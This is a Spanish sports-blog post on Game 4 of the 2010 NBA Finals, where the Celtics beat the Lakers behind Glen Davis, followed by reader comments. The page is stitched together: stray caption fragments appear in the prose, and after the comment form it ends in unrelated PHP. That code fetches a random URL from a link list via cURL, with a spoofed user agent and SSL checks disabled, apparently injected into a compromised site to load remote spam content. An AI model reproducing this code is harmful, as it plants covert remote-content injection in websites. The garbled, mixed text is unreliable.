Finales 2010 (4º partido): Un acto de fe

11 de June de 2010 por MagicJohnson32

glenateSe equivocaba Paul Pierce, y jamás habrá estado tan feliz de equivocarse: las Finales regresarán con toda seguridad a Los Angeles para la disputa de al menos el 6º partido. Los Celtics se aseguraron de ello al empatar la serie a 2 la pasada madrugada de la mano de Glen Davis, auténtico protagonista, un martirio para los Lakers y en especial para un Lamar Odom que se vio desbordado por Big Baby y por la pesada carga de la responsabilidad. La rodilla de Andrew Bynum va de mal en peor y todo apunta a que sus minutos a partir de ahora van a ser muy limitados, con lo que corresponde a Odom dar un paso adelante, dejar de comportarse como factor X (eufemismo para referirse a un jugador incapaz de aportar con regularidad) y empezar a hacerlo como, por ejemplo, el Odom de las Finales del año pasado contra los Magic.

La cuestión es que del vacío que dejó el maltrecho Bynum en la zona sacó el máximo provecho Glen Davis, eléctrico, imparable, intensísimo. Los Lakers no encontraron respuesta para él; a juzgar por la actividad de Odom y Gasol, uno diría que ni siquiera la buscaron. El cansancio afectó de forma evidente a Pau, cuya intimidación se echó en falta en el tramo final, y a Kobe Bryant, que con frecuencia ha de batallar demasiado para que sus compañeros sean capaces de hacerle llegar el balón. Aun así, ambos fueron de lo poco salvable por parte de los Lakers. Especialmente acertado desde la línea de 3, Kobe mantuvo a flote a los suyos con algunas canastas espectaculares hasta que Glen Davis se apropió del partido.

nateloDavis contó con la colaboración de Nate Robinson en ataque, y con la buena labor en defensa de Sheed Wallace y Tony Allen. El banquillo de los Celtics es material inestable (prueba de ello son las técnicas a Wallace y Nate), pero cuando entran en combustión no hay fórmula para detenerlos. Ni Rondo, ni Pierce, ni Garnett estaban en pista cuando los Celtics rompieron el partido y pasaron de 62-60 a 74-85 a menos de 4 minutos para el final. De hecho, asistimos a algo tan inusual como que Doc Rivers mandase de vuelta al banquillo a KG cuando esté esperaba junto a la mesa de anotadores para ingresar en pista. Glen Davis & Co. se habían ganado semejante acto de fe.

Los Lakers hicieron un último esfuerzo, agónico y en vano, que sirvió para poco más que alargar la emoción hasta casi el final. Llegaron a ponerse a 6 y con posesión pero las pérdidas de Gasol y Kobe, extenuados, sellaron el triunfo local. Hay Finales, vaya si las hay. El domingo, a las 2 h, se disputará en Boston el quinto partido, último antes de que las series regresen a Los Angeles.

Se equivocaba Paul Pierce, sueñan los Celtics.

PREMIOS

MVP: Sin duda, el partido fue de Glen Davis. Más allá de unos notables 18 puntos en 22 minutos con 7 de 10 en tiros de campo, lo suyo fue quebrar la moral de los Lakers hasta dejarlos k.o.

La sorpresa: El parcial de 12-25 con el que los suplentes de los Celtics ganaron el partido se puede considerar como la gran sorpresa de la noche. La aportación de Nate Robinson, 12 puntos y 2 asistencias en 17 minutos, destacó en lo individual.

La decepción: Lamar Odom fue el único laker en dobles figuras de anotación al margen de Kobe y Gasol, pero, con minutos de titular por la kbdownlesión de Bynum, se vio desbordado por el huracán Davis y eso afectó a su juego en ambos lados de la cancha.

El mayor esfuerzo en vano: Kobe Bryant resoplaba en los últimos minutos del partido, visiblemente agotado. La defensa de los Celtics le obliga a sudar incluso para recibir. Aun así, y pese a las 7 pérdidas, fue el mejor de los Lakers con 33 puntos, 6 rebotes, 2 asistencias y 2 robos.

Comenta

12 comentarios a esta entrada

  1. Txusma dice:
    #1

    Curiosidad: Desde la mega racha de Ray Allen en segundo partido (ese 7-7), tan sólo ha anotado 1 triple de 15 intentos…

      Citar

  2. univerzee dice:
    #2

    Bueno, según mi punto de vista Rivers se acaba de cargar el mito donde lo tenia, ha tenido que recurrir a la presión sobre los árbitros para conseguir lo que quería… un partido lleno de marrullerías, desplantes, protestas, provocaciones, como la de la foto de NRobinson a LOdom, o las KG a Gasol o la de Perkins en un TO a Kobe, o las protestas de RWallace, una técnica… este hombre sólo lleva una técnica en todas las series, ni su madre que lo tendrá por buen chico se lo cree. O las protestas de Rivers… o la falta de ataque de Pierce que fue un 2+1 sobre Kobe. Todo eso conseguido con unas declaraciones.
    La primera cifra son las faltas de BOS y la segunda las de LAL.

    28 26 LAL win 54faltas
    29 29 BOS win 58faltas
    27 20 LAL win 47faltas
    21 23 BOS win 44faltas

    Conseguir que por primera vez en las series LAL haga más faltas que BOS, es otro merito. Y te leo y dices, las dificultades para que la bola llegue a Kobe… añado o para que Gasol reciba al poste… todo eso resumido en 21 faltas, 5 de RWallace, sin contar la técnica. Y aún así LAL pudo ganar de no ser como dices porque Odom en plenas facultades no parece ser mejor que Bynum cojo.
    Si como he leído por ahí, Rivers le ganó la partida a PJ, esta vez fuera de la cancha. Pero esta vez no le admiro por ello.

      Citar

  3. Albertis dice:
    #3

    Partido bronco, de los que suele salir airoso Boston antes que los de California, por los Lakers vi a Gasol y Kobe muy solos, Bynum no puede casi ni saltar y algunos dirán que intimida pero poco puede hacer en ese estado físico; Odom pasó casi desapercibido, puede hacer mucho más y el banquillo nada de nada. Curioso porque los Celtics se llevaron el partido con una actuación muy discretita del Big Four, Pierce empezó fulgurante pero luego estuvo 2 cuartos y medio missing y Allen no enchufa.
    Como dice el comentarista de ESPN Argentina: “Este Big Baby es como una bailarina en un cuerpo de jugador de rugby!!!!!”
    Saludos

      Citar

  4. Nacho dice:
    #4

    Magic, de acuerdo en casi todo, aunque realmente en desacuerdo, Vale que partido controlado por Lakers hasta el factor banquillo y más concretamente Big Baby. Vale que desastroso Odom. Pero el partido, a pesar de los buenos números de ambos, se fue por el desagüe de Kobe y Pau. no por no leer bien la defensa, más disculpable; y otro por no fajarse más en defensa, y más concretamente en el rebote defensivo. Y que conste que soy de los Lakers, y más de Gasol. Pero éste se refrescó en demasia en defensa para rendir mejor en ataque, hasta cierto punto entendible. Pero…. delegó su responsabilidad en el rebote. Ya se vio desde el inicio cediendo rebotes a sus compañeros que eran suyos; consecuencia: dejó de cerrar el rebote defensivo y por allí se coló Big Baby. Los puntos de segunda opción son brutales por que no solo suman lo que cualquier otro, sino que te dan un plus de defensa y de moral que no es tangible pero que puede ser decisivo, como ayer. Por ahí se fue el partido para Lakers.
    Univerzee, no me vale tu análisis, LA tenía que ganar sí o sí; son superiores, pero no supieron contrarrestar el factor GANAS, lo de los árbritos no puede ser excusa.
    Miremos el lado positivo, más partidos.

      Citar

  5. Viva_Dirk dice:
    #5

    Los Lakers lo tuvieron en su mano, en los último 4 minutos se dejaron coger multiples rebotes en ataque y cuando aun podian llegó la vergonzosa falta que le pitan a Kobe sobre Pierce, realmente me puso de mala ostia cuando lo vi.

      Citar

  6. Love Denise dice:
    #6

    solo he visto el ultimo cuarto, y me quede con la sensacion de que a los Lakers se le ha escapado los Celtics y el anillo vivos. Magnifica ocasion para dejar sentenciada la eliminatoria. Pienso que quien gane el 5º se lleva el anillo, y creo que va a ser Lakers. Y no estaria nada mal que Pau fuese el MVP, que para mi esta siendo el mejor de su equipo.
    Quizas soy muy exigente, pero aunque Lakers sean campeones, de cara al año que viene creo que deberian dejarse de Mbengas y Powell y fichar a algun pivot de bajo coste (como cuarto jugador alto) que ofrezca unos 15 minutos aprovechables. Al final, Pau estaba ya muy quemado de tantos minutos, y con el historial de Bynum…

    pd: este mundial es insoportable, entre los comentaristas de t5 y las trompetas….. ahhhhhh!

      Citar

  7. David dice:
    #7

    Sí, la falta de Kobe a Pierce, pero si no recuerdo mal, hubo otra igual en la que pitaron ataque cuando Bryant no tenia los pies parados en el suelo. Los árbitros influyen, pero no creo que fueran decisivos, ni siquiera con esa falta. De hecho, yo creo que han estado un pelín caseros en todos los partidos salvo quizá en el 3º, lo que no es un bagaje demasiado extraño ni como para poner el grito en el cielo, en mi opinión.

    Powell/Mbenga debe jugar, sufrirá todo lo que sea, pero Pau no puede jugar tantos minutos, ni Odom si está missing. Aunque bueno, yo a Odom lo hubiera mandado un par de minutos, y justo anotó unas buenas canastas (aunque muy forzadas) xD.

    Si no fuera por el partido tan acertado en triples de Kobe, habríamos asistido a otro mejor partido de Pau que de Bryant, pero con eso… difícil que le den el MVP, aunque a ver, quedan 2 partidos mínimo.

      Citar

  8. pablito dice:
    #8

    Hace tiempo que leo este blog y los comentarios que hacéis, pero nunca había comentado.

    En cambio, hoy no me puedo estar de aportar mi opinión, pues creo que difiere mucho de lo que he leído por aquí.

    Los árbitros están siendo muy rigurosos con los Celtics y en ningún momento de las finales les han favorecido. La falta de Kobe era en ataque, sí, pero en el segundo cuarto hay una jugada exactamente al revés, con falta en ataque de Pierce, cuando Kobe no está parado.

    A Wallace le pitaron por lo menos dos faltas que no eran y la técnica a Robinson es cuanto menos cuestionable, o alguien se cree que Kriptonita fuera a por jaleo…

    Y quien compare a los Celtics con los Bad Boys es porque no sabe lo que es la NBA. Estos Celtics son los Celtics de toda la vida, un equipo poco estético, luchador y ganador como el que más.

    Rivers se está comiendo a JAckson, que tiene las mejores armas (kobe y Pau), pero que no tiene nada más. Doc dispone de muchas variantes y aunque sus estrelllas estén ofreciendo un juego por debajo del nivel esperado,, siempre pueden aparecer secundarios de lujo.

      Citar

  9. Txusma dice:
    #9

    Qué? Quién gane esta noche se llevará el campeonato?

      Citar

  10. Marcaco dice:
    #10

    lakers ganara el 6º seguro, asi q esta noche solo puede servir pqra acelerar lo q todos ya sabemos…
    (eso quiere decir q lakers ganaran, por si alguien no ha entendido por donde iban los tiros)

    besos

      Citar

  11. Nacho dice:
    #11

    Txusma, no. Esta noche ganará Alemania y el campeonato lo ganará España.
    Puff, yo apostaría por Lakers, pero ¿que van a hacer con el rebote?
    ¿pararán a Big Baby? ¿firmará éste con la NFL y nos dejará tranquilos a los amarillos?
    ¿Habrán visto los Celtics los dos partidos del Caja Laboral contra el BarÇa?
    ¿Será Marcelinho el sustituto de Fisher?
    ¿Habrá descansado Paul Pierce?
    Si es sí, ¿le imporortará eso un bledo a Artest?
    SI RON RON ESTÁ ENTRE EL 35 Y 40% DE TIROS HOY GANAN LAKERS

      Citar

  12. Txusma dice:
    #12

    Más les vale que juegue Bynum… Que digo yo, en caso de q no jueguen no podrían los Lakers dar algunos minutos a Powell e incluso a Mbenga para q se peguen con Davis y Perkins? Es importante que Gasol descanse algo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>